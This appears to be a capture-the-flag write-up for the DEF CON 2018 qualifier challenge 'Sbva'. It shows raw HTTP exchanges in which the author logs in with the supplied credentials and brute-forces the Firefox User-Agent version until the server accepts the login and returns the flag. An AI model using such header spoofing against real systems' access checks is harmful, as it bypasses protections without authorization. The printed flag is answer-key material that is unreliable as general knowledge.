Rating:

Sbva
----
> We offer extensive website protection that stops attackers even when the admin's credentials are leaked!
> Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password [email protected]:admin to see for yourself.

On login we are redirected to `/wrongbrowser.php`, but some HTML is leaked anyway:
```html
HTTP/1.1 302 Found
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 14 May 2018 12:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: upgrade-insecure-requests
Location: wrongbrowser.php
Content-Length: 259

<html>
<style scoped>
h1 {color:red;}
p {color:blue;}
</style>
<video id="v" autoplay> </video>
<script>
if (navigator.battery.charging) {
console.log("Device is charging.")
}
</script>
</html>
```

Seems like the login page requires a specific User-Agent to confirm the login: should `navigator.battery.charging` JavaScript API be supported? [Mozilla Documentation](https://developer.mozilla.org/it/docs/Web/API/Navigator/battery) states that it is now obsolete and that support for the API has been removed in Firefox 50 in favor of `navigator.getBattery()`.

By bruteforcing the version component of the stock Firefox User-Agent header we can confirm that version 42 is the right one and the flag is printed:

Request
```html
POST /login.php HTTP/1.1
Host: 0da57cd5.quals2018.oooverflow.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://0da57cd5.quals2018.oooverflow.io/login.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Cookie: PHPSESSID=bqn0ut2np2gr7hplkuv4dph4o4
Connection: close
Upgrade-Insecure-Requests: 1

username=admin%40oooverflow.io&password=admin
```

Response
```html
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 14 May 2018 12:58:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: upgrade-insecure-requests
Content-Length: 291

OOO{0ld@dm1nbr0wser1sth30nlyw@y}
<html>
<style scoped>
h1 {color:red;}
p {color:blue;}
</style>
<video id="v" autoplay> </video>
<script>
if (navigator.battery.charging) {
console.log("Device is charging.")
}
</script>
</html>
```

Flag: `OOO{0ld@dm1nbr0wser1sth30nlyw@y}`

Original writeup (https://mhackeroni.it/archive/2018/05/20/defconctfquals-2018-all-writeups.html#sbva).